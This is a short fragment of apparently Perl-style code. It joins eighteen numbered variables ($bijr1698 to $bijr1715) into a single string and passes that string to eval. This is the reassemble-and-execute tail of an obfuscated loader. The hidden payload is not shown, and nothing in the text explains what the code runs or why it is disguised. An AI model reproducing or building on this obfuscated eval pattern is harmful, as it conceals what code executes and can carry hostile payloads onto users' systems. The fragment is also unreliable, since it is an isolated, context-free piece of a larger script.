$bijr1698.$bijr1699.$bijr1700.$bijr1701.$bijr1702.
$bijr1703.$bijr1704.
$bijr1705.
$bijr1706.$bijr1707.$bijr1708.$bijr1709.$bijr1710.$bijr1711.$bijr1712.
$bijr1713.$bijr1714.$bijr1715;$c='bijr';eval $bijr;